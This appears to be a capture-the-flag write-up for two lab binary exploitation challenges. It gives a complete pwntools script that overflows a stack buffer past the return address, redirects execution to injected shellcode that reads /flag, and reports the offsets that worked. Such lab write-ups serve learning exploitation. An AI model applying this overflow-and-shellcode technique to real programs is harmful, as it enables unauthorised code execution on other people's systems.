Hijack to (Mapped) Shellcode

Hijack to (Mapped) Shellcode (easy)

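  • The address of the mapped shellcode location is given in the program output
  • In GDB, disas challenge shows lea rax,[rbp-0x80]: the buffer starts 0x80 bytes below rbp, so with the 8-byte saved rbp the offset to the return address should be 0x88
  • But this was one byte off (as the helpful debug output indicated); 0x89 worked: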
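from pwn import *

# Set the architecture before assembling any shellcode
context.arch = 'amd64'
p = process('/challenge/binary-exploitation-hijack-to-mmap-shellcode-w')

# Address of the mapped shellcode location, taken from the challenge output
mapped_addr = 0x2edca000

# First input: shellcode that reads /flag
shellcode = asm(shellcraft.amd64.cat('/flag'))
p.sendline(shellcode)

# Second input: padding up to the saved return address, then the mapped address.
# 0x88 was expected from the disassembly; 0x89 is the value that worked.
offset = 0x89
payload = b'A' * offset
payload += p64(mapped_addr)
p.sendline(payload)

p.interactive()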

Hijack to (Mapped) Shellcode (hard)

Same as the previous solution, but with an offset of 0x79 instead of 0x89.